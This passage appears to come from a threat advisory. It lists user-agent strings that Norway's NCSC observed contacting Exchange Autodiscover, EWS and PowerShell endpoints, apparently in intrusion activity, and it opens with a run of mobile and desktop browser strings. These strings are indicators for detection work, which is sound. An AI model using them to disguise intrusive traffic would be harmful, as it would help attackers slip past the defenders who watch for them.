Mozilla/5.0 (iPhone; U; CPU iPhone OS 4_0_1 like Mac OS X; en-us) AppleWebKit/532.9 (KHTML, like Gecko) Version/4.0.5 Mobile/8A306 Safari/6531.22.7
Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en-US; rv:1.8.0.7) Gecko/20060909 Firefox/1.5.0.7
Mozilla/5.0 (Linux; Android 7.0; Moto C Build/NRD90M.059) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Mobile Safari/537.36
Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.02272.101 Safari/537.36
Mozilla/5.0 (Linux; Android 5.1.1; SAMSUNG SM-J120M Build/LMY47X) AppleWebKit/537.36 (KHTML, Like Gecko) SamsungBrowser/6.4 Chrome/56.0.2924.87 Mobile Safari/537.36
Mozilla/5.0 (iPhone; CPU iPhone OS 9_0_2 like Mac OS X) AppleWebKit/601.1.45 (KHTML, like Gecko) Version/9.0 Mobile/13A452 Safari/601.1
NCSC-NO observed the following user agents communicating with Exchange Autodiscover:
ExchangeServicesClient/15.00.0913.015
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Firefox/114.0
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/114.0.0.0 Safari/537.36 Edg/114.0.0.0
NCSC-NO observed the following user agents communicating with EWS (/ews/Exchange.asmx):
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36 Edg/103.0.1264.49
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
NCSC-NO observed the following user agent communicating with Exchange (/powershell):
Windows WinRM Client